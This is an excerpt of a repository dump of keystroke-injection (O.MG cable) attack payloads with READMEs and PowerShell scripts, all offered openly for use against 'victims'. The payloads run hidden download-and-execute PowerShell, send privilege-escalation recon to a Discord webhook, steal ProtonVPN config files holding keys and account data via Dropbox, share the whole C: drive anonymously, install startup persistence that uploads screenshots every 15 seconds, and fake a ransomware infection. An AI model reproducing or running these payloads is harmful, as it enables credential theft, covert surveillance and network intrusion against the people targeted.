    "path": "OMG/payloads/Printer-Recon/payload.txt",
    "content": "REM     Title: Printer-Recon\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "OMG/payloads/Priv-Paths/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Priv+Paths!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Printer-Recon\n\n## Description\n\nA payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.\n\n## Getting Started\n\n### Dependencies\n\n* Discord Webhook or other service that uses webhooks\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Command will be entered in the command prompt to search for unqouted service paths so you can later exploit them for priv esc\n```\nwmic service get name, displayname, pathname, startmode | findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v ^\"^\"^\" > p.txt\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/Priv-Paths/payload.txt",
    "content": "REM     Title: Priv-Paths\r\nREM     Author: atomiczsec\r\nREM     Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.\r\nREM     Target: Windows 10\r\n\r\nDELAY 3000\r\nGUI r \r\nDELAY 1000\r\nSTRING cmd \r\nENTER\r\nDELAY 500\r\nSTRING cd %HOMEPATH%\r\nENTER\r\nDELAY 1000\r\nSTRING wmic service get name, displayname, pathname, startmode | findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v ^\"^\"^\" > p.txt\r\nENTER\r\nDELAY 1000\r\nSTRING curl.exe -F \"payload_json={\\\"username\\\": \\\"p\\\", \\\"content\\\": \\\"**Paths**\\\"}\" -F \"file=@p.txt\" YOUR-DISCORD-WEBHOOK\r\nENTER\r\nDELAY 200\r\nSTRING del p.txt\r\nENTER\r\nDELAY 100\r\nSTRING exit\r\nENTER"
  },
  {
    "path": "OMG/payloads/Proton-Hog/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Proton+Hog!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Proton-Hog\n\nA payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.\n\n## Description\n\nThis payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file\n\nThen dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/Proton-Hog/payload.txt",
    "content": "REM     Title: Proton-Hog\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "OMG/payloads/Proton-Hog/s.ps1",
    "content": "function DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR-DROPBOX-TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\n# Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored\r\n\r\nif (-not(Test-Path \"$env:USERPROFILE\\AppData\\Local\\ProtonVPN\")) {\r\n     try {\r\n         Write-Host \"The VPN folder has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n\r\n  else {\r\n$protonVpnPath = \"$env:USERPROFILE\\AppData\\Local\\ProtonVPN\"\r\ncd $protonVpnPath\r\nGet-ChildItem | Where-Object {$_.name -Match \"ProtonVPN.exe\"} | cd\r\nGet-ChildItem | cd\r\n\r\n# Upload user.config to dropbox\r\nDropBox-Upload -f \"user.config\"\r\n} "
  },
  {
    "path": "OMG/payloads/Pwn-Drive/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/lock.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Pwn+Drive!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Pwn-Drive\n\nA payload to share the victims \"C:\" drive to the network.\n\n## Description\n\nThis payload will share the entire victims \"C:\" drive to the entire network for further exploitation.\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/Pwn-Drive/c.ps1",
    "content": "#Pwn-Drive\r\n\r\n#Enable Network Discovery\r\nnetsh advfirewall firewall set rule group=”network discovery” new enable=yes\r\n\r\n#Enable File and Print\r\nnetsh firewall set service type=fileandprint mode=enable profile=all\r\n\r\n#Setting Registry Values for allowing access to drive without credentials\r\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" -Name everyoneincludesanonymous -Value 1 -Force\r\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanManServer\\Parameters\\\" -Name restrictnullsessacces -Value 0 -Force\r\n\r\n#Sharing the Drive\r\nNew-SmbShare -Name \"Windows Update\" -Path \"C:\\\""
  },
  {
    "path": "OMG/payloads/Pwn-Drive/payload.txt",
    "content": "REM     Title: Pwn-Drive\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload will share the entire victims \"C:\" drive to the entire network for further exploitation.\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "OMG/payloads/RanFunWare/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/WannaCry.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=RanFunWare!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# RanFunWare\n\nA payload to prank your friends into thinking their computer got hit with ransomware.\n\n## Description\n\nThis payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable)\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/RanFunWare/payload.txt",
    "content": "REM     Title: RanFunWare\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload will prank your target into thinking their machine got hit with ransomware.\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "OMG/payloads/RanFunWare/r.ps1",
    "content": "#Hides Desktop Icons\r\n$Path=\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\"\r\nSet-ItemProperty -Path $Path -Name \"HideIcons\" -Value 1\r\nGet-Process \"explorer\"| Stop-Process\r\n\r\n#Changes Background  \r\n#URL For the Image of your choice (Wanna Cry Ransomware Background)\r\n$url = \"https://c4.wallpaperflare.com/wallpaper/553/61/171/5k-black-hd-mockup-wallpaper-preview.jpg\"\r\n\r\n\r\nInvoke-WebRequest $url -OutFile C:\\temp\\test.jpg\r\n\r\n\r\n$setwallpapersrc = @\"\r\nusing System.Runtime.InteropServices;\r\n\r\npublic class Wallpaper\r\n{\r\n  public const int SetDesktopWallpaper = 20;\r\n  public const int UpdateIniFile = 0x01;\r\n  public const int SendWinIniChange = 0x02;\r\n  [DllImport(\"user32.dll\", SetLastError = true, CharSet = CharSet.Auto)]\r\n  private static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);\r\n  public static void SetWallpaper(string path)\r\n  {\r\n    SystemParametersInfo(SetDesktopWallpaper, 0, path, UpdateIniFile | SendWinIniChange);\r\n  }\r\n}\r\n\"@\r\nAdd-Type -TypeDefinition $setwallpapersrc\r\n\r\n[Wallpaper]::SetWallpaper(\"C:\\temp\\test.jpg\")\r\n\r\n\r\n#Pop Up Message\r\n\r\nfunction MsgBox {\r\n\r\n[CmdletBinding()]\r\nparam (\t\r\n[Parameter (Mandatory = $True)]\r\n[Alias(\"m\")]\r\n[string]$message,\r\n\r\n[Parameter (Mandatory = $False)]\r\n[Alias(\"t\")]\r\n[string]$title,\r\n\r\n[Parameter (Mandatory = $False)]\r\n[Alias(\"b\")]\r\n[ValidateSet('OK','OKCancel','YesNoCancel','YesNo')]\r\n[string]$button,\r\n\r\n[Parameter (Mandatory = $False)]\r\n[Alias(\"i\")]\r\n[ValidateSet('None','Hand','Question','Warning','Asterisk')]\r\n[string]$image\r\n)\r\n\r\nAdd-Type -AssemblyName PresentationCore,PresentationFramework\r\n\r\nif (!$title) {$title = \" \"}\r\nif (!$button) {$button = \"OK\"}\r\nif (!$image) {$image = \"None\"}\r\n\r\n[System.Windows.MessageBox]::Show($message,$title,$button,$image)\r\n\r\n}\r\n\r\nMsgBox -m 'Your Computer Has Been Infected' -t \"Warning\" -b OKCancel -i Warning\r\n"
  },
  {
    "path": "OMG/payloads/Screen-Shock/I.bat",
    "content": "@echo off\r\npowershell -Command \"& {cd \"$env:userprofile\\AppData\\Roaming\"; powershell -w h -NoP -NonI -Ep Bypass -File \"c.ps1\"}\"\r\npause\r\n"
  },
  {
    "path": "OMG/payloads/Screen-Shock/README.md",
    "content": "<img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png\" width=\"200\">\n\n<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Screen+Shock!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Screen-Shock\n\nThis payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)\n\n## Description\n\nThis payload uses iwr to download 2 files\n* I.bat\n* c.ps1\n\n**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup\n\n**c.ps1** will sit in AppData\\Roaming folder, taking a screenshot of all monitors every 15 seconds\n\nThen the contents will then be sent to the DropBox for viewing pleasure\n\n\n\n## Getting Started\n\n### Dependencies\n\n* Pastebin or other file sharing service, Dropbox\n* Windows 10\n* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Device will download both files and place them in proper directories to then run the script\n```\npowershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\"\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/Screen-Shock/c.ps1",
    "content": "function DropBox-Upload {\r\n\r\n[CmdletBinding()]\r\nparam (\r\n    \r\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n[Alias(\"f\")]\r\n[string]$SourceFilePath\r\n) \r\n$DropBoxAccessToken = \"YOUR-DROPBOX-TOKEN\"   # Replace with your DropBox Access Token\r\n$outputFile = Split-Path $SourceFilePath -leaf\r\n$TargetFilePath=\"/$outputFile\"\r\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n$authorization = \"Bearer \" + $DropBoxAccessToken\r\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n$headers.Add(\"Authorization\", $authorization)\r\n$headers.Add(\"Dropbox-API-Arg\", $arg)\r\n$headers.Add(\"Content-Type\", 'application/octet-stream')\r\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n}\r\n\r\nwhile(1){\r\n\r\n  Add-Type -AssemblyName System.Windows.Forms,System.Drawing\r\n\r\n  $screens = [Windows.Forms.Screen]::AllScreens\r\n\r\n  $top    = ($screens.Bounds.Top    | Measure-Object -Minimum).Minimum\r\n  $left   = ($screens.Bounds.Left   | Measure-Object -Minimum).Minimum\r\n  $width  = ($screens.Bounds.Right  | Measure-Object -Maximum).Maximum\r\n  $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum\r\n\r\n  $bounds   = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)\r\n  $bmp      = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)\r\n  $graphics = [Drawing.Graphics]::FromImage($bmp)\r\n\r\n  $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)\r\n\r\n  $bmp.Save(\"$env:USERPROFILE\\AppData\\Local\\Temp\\$env:computername-Capture.png\")\r\n  $graphics.Dispose()\r\n  $bmp.Dispose()\r\n  \r\n  start-sleep -Seconds 15\r\n \"$env:USERPROFILE\\AppData\\Local\\Temp\\$env:computername-Capture.png\" | DropBox-Upload\r\n}"
  },
  {
    "path": "OMG/payloads/Screen-Shock/payload.txt",
    "content": "REM     Title: Screen-Shock\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI\r\nDELAY\r\nSTRING powershell -w h -NoP -NonI -Ep Bypass \"echo (iwr PASTEBIN LINK FOR BAT).content > \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\l.bat\";echo (iwr PASTEBIN LINK FOR PS1).content > \"$env:APPDATA\\c.ps1\";powershell \"$env:APPDATA\\c.ps1\"\" \r\nENTER\r\n\r\nREM     Remember to replace the link with your pastebin shared link for the intended files to download\r\nREM     Also remember to put in your discord webhook in c.ps1\r\nREM     For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH"
  },
  {
    "path": "OMG/payloads/Screen-Shock/placeholder",
    "content": "\n"
  },
  {
    "path": "OMG/payloads/Spotify-Spy/README.md",
